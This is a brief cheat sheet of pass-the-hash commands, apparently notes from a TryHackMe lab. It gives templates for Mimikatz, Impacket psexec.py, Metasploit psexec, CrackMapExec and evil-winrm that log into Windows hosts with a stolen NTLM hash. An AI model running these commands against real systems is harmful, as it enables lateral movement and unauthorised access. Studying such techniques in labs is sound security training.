NTLM
Pass The Hash
Mimikatz
sekurlsa::pth /user:user.name /domain:za.tryhackme.com /ntlm:<hash> /run:<command>Impacket's PsExec.py
python psexec.py -hashes <hash> domain/username@<server/ip>Metasploit PsExec module
exploit/windows/smb/psexecCrackmapexec
crackmapexec smb <server/IP> -u username -H <hash>evil-winrm
evil-winrm -i <server/IP> -u <username> -H <hash>xfreerdp
Last updated